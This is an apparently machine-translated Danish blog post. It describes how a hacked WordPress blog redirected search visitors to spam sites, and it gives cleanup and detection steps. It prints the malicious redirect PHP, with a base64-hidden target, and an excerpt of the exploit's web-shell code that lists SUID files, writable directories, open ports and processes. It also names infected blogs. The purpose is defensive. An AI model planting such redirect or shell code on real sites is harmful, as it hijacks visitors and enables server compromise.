Virusblogosfæren ... men hvad havde du med mig?!

I den sidste måned har jeg modtaget advarsler virus blog i nogle besøgende. Oprindeligt jeg ignorerede advarslerne, fordi jeg installerede en temmelig god antivirus (Kaspersky AV 2009) Og selvom bloggen i lang tid, jeg fik aldrig en virus alert (.. Jeg så noget mistænkeligt tidligere, at den første refresh forsvundet. Endelig ...).
Langsomt begyndte at dukke store variationer besøgende trafikHvorefter trafikken sidst er faldet støt og begyndte at være flere og flere mennesker, der fortæller mig, at stealthsettings.com det er virusser. I går modtog jeg fra en person et screenshot gjort, når antivirus blokerede en script fra stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Det var temmelig overbevisende for mig, at jeg sætter alle kilder søgte. Den første idé, der kom til mit sind var at gøre opgradering den nyeste version af WordPress (2.5.1), men ikke før sletning af alle filer i det gamle script WordPress og at lave backup-database. Denne procedure fungerede ikke, og det tog sandsynligvis lang tid at finde ud af, hvor fejlen var, hvis den ikke havde fortalt mig. Eugen i en diskussion over en kop kaffe, fandt han link Google, og det ville være godt at se ham.
MyDigitalLife.info offentliggjorde en artikel med titlen: “WordPress Hack: Gendan og ret Google og søgemaskine eller ingen cookietrafik omdirigeret til Your-Needs.info, AnyResults.Net, Golden-Info.net og andre ulovlige websteder"Det er slutningen af ​​tråden jeg havde brug for.
Det handler om en udnytte de WordPress baseret på cookies, Hvilket jeg synes er meget kompleks og gjort bogen. Klog nok til at gøre en SQL Injection Database af bloggen, at skabe et usynligt bruger en simpel rutine tjek Hovedmenu->Brugere, tjekke server mapper og filer "skrivbare" (at chmod 777), for at søge og til udføre filer med privilegier root-brugeren eller gruppen. Jeg ved ikke, hvem udnytter navn og se, at der er få artikler skrevet om ham, til trods for at mange blogs er smittet, herunder Rumænien. Ok ... Jeg vil prøve at forsøge at forklare almindeligheder om virus.

Hvad er virus?

Først indsætter kilden siderne til blogs, links usynlige for besøgende, men synlige og vendeskær til søgemaskiner, især Google. På denne måde overføre sideplacering til websteder, der er angivet af hackeren. For det andet indsættes en anden omdirigering kode URL for besøgende der kommer fra Google, Live, Yahoo, ... eller en RSS-læser, og ikke det websted cookie. A antivirus registrerer omdirigering som Trojan-Clicker.HTML.

Symptomer:

Massive fald i besøgende trafik, Især på blogs, hvor de fleste besøgende kommer fra Google.

Identifikation: (det er her problemet bliver kompliceret for dem, der ikke ved meget om phpmyadmin, php og linux)

LA. OBS! Først lave en backup database!

1. Kontroller kildefilerne index.php, header.php, footer.php, The blog emne, og se om der er en kode, der bruger kryptering base64 eller indeholder “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”i form:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... Eller noget. Slet denne kode!

Klik på billedet ...

index kode

I skærmbilledet ovenfor valgte jeg ved et uheld og " ". Denne kode skal forblive.

2. Brug phpMyAdmin og gå til database tabel wp_usersHvor kontrollere, om der er nogen brugernavn oprettet på 00:00:00 0000-00-00 (Mulig placering user_login at skrive "WordPress”. Skriv denne brugers ID (ID-felt) ned og slet det.

Klik på billedet ...

Falsk bruger

* Den grønne linje bør fjernes og beholdt sit id. I tilfælde af søvnigVar ID = 8 .

3. Gå til tabellen wp_usermeta, Hvor placeret og Fjern linjer for id (hvor feltet user_id ID værdi vises slettet).

4. I tabel wp_option, Til Go active_plugins og se, hvad plugin er aktiveret mistænkte. Det kan bruges som slutninger _old.giff, _old.pngg, _old.jpeg, _new.php.giffosv. kombinationer af rige billedudvidelser med _old og _nyt.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Slet dette plugin, og gå derefter til bloggen -> Dashboard -> Plugins, hvor du deaktiverer og aktiverer ethvert plugin.

Klik på billedet for at se det ser active_plugins virus fil.

plugin

Følg stien på FTP eller SSH, der er angivet i active_plugins og slette filen fra serveren.

5. Også i phpMyAdmin, i tabellen wp_option, Finde og slette den linje, der indeholder "rss_f541b3abd05e7962fcab37737f40fad8"Og blandt"internal_links_cache ".
I internal_links_cache gøres krypterede spam links, der vises i din blog og en kode af Google Adsnakken, The hacker.

6. Anbefalet er at ændre password Blog og login fjerne alle mistænkelige userele. Opgrader til den nyeste version af WordPress og indstil bloggen til ikke længere at tillade nye brugere at registrere sig. Der er ingen tab... kan også kommentere ubeboet.

Jeg prøvede ovenfor at forklare lidt, hvad man skal gøre i en sådan situation, for at rense bloggen for denne virus. Problemet er meget mere alvorligt end det ser ud til og ikke næsten løst, fordi de bruges sikkerhedshuller den webserver hosting, som er blog.

Som en første foranstaltning af sikkerhed, med adgang SSH, Lav nogle kontroller på serveren for at se om nogen filer som * _old * og * _new. * Med endelser.giff. jpeg,. pngg. jpgg. Disse filer bør udgå. Hvis du omdøber en fil, for eksempel. top_right_old.giff in top_right_old.phpVi ser, at filen er præcis den exploit-kode serveren.

Nogle nyttige instruktioner til kontrol, rengøring og sikring af serveren. (via SSH)

1.  cd / tmp og se om der er mapper som tmpVFlma eller andre kombinationer har samme navn og slette den. Se screenshot nedenfor to sådanne mapper fra mig:

tmpserver

rm-rf mappenavn

2. Kontroller og fjern (ændre chmod-ul) som muligt mapperne med attributter chmod 777

find alle skrivbare filer i den aktuelle mappe: Find. -Type F-perm-2-ls
finde alle skrivbare mapper i den aktuelle dir: Find. -Type d-perm-2-ls
find alle skrivbare mapper og filer i den aktuelle mappe: Find. -Perm-2-ls

3. Leder du efter mistænkelige filer på serveren.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, OBS! de filer, der blev sat bit SUID si Sgid. Disse filer udføre med rettighederne for brugeren (gruppe) eller rod, ikke den bruger, der køre filen. Disse filer kan føre til rod kompromis, hvis det sikkerhedsspørgsmål. Hvis du bruger filerne med SUID og sgid bits, udføre 'chmod 0 " på eller afinstallere den pakke der indeholder dem.

Udnytte indeholder andet sted i kilden ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

På denne måde ... dybest set finder brud på sikkerheden. Havne åbne biblioteker "skrivbare", og gruppen execution privilegier filer / rod.

Tilbage med mere ...

Nogle inficerede blogs: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindblog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... Listen går ... en masse.

Du kan kontrollere, om en blog er inficeret ved hjælp af Googles søgemaskine. kopier indsæt:

hjemmeside www.blegoo.com buy

Godnat og godt arbejde;) Snart tror jeg, at Eugen kommer med nyheder på foreseeable.unpredictable.com.

brb :)

OPMÆRKSOMHED! Ændring af temaet for WordPress eller opgrader til WordPress 2.5.1, er IKKE en løsning til at slippe af med denne virus.

Teknologientusiast, jeg skriver med glæde på StealthSettings.com siden 2006. Jeg har rig erfaring med operativsystemer: macOS, Windows og Linux, samt programmeringssprog og blogplatforme (WordPress) og til onlinebutikker (WooCommerce, Magento, PrestaShop).

Hvordan man » bemærkelsesværdige » Virusblogosfæren ... men hvad havde du med mig?!
Efterlad en kommentar